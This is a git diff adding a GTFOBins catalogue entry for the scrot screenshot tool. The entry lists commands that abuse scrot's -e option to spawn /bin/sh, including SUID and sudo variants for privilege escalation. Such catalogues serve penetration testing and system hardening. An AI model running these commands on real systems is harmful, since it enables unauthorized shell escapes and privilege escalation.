diff --git a/_gtfobins/scrot.md b/_gtfobins/scrot.md new file mode 100644 index 0000000..fe566d6 --- /dev/null +++ b/_gtfobins/scrot.md @@ -0,0 +1,10 @@ +--- +description: This requires a running X server. +functions: + shell: + - code: scrot -e /bin/sh + limited-suid: + - code: ./scrot -e /bin/sh + sudo: + - code: sudo scrot -e /bin/sh +---